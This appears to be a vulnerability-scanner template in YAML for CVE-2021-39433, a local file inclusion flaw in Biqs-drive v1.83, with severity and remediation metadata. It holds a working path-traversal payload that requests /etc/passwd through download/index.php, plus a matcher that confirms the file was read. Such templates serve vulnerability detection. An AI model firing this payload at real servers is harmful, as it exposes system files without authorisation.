43 lines
1.5 KiB
YAML
43 lines
1.5 KiB
YAML
id: CVE-2021-39433
|
|
|
|
info:
|
|
name: BIQS IT Biqs-drive v1.83 Local File Inclusion
|
|
author: Veshraj
|
|
severity: high
|
|
description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
|
|
remediation: |
|
|
Upgrade to the latest version of BIQS IT Biqs-drive (v1.84 or higher) which includes a fix for the Local File Inclusion vulnerability.
|
|
reference:
|
|
- https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433
|
|
- https://biqs-drive.be/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-39433
|
|
epss-score: 0.00637
|
|
epss-percentile: 0.76876
|
|
cpe: cpe:2.3:a:biqs:biqsdrive:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: biqs
|
|
product: biqsdrive
|
|
tags: lfi,biqsdrive,cve,cve2021
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a0046304402204b9aac964cc58b936c93cd6ca3f7c1bd1a19f2e930472118d5e9ac3e66abf3bc02200a47ab29c92b1ed31ffb14cbdb15ac475762fb929fa8b34991d30ce1caf17825:922c64590222798bb761d5b6d8e72950
|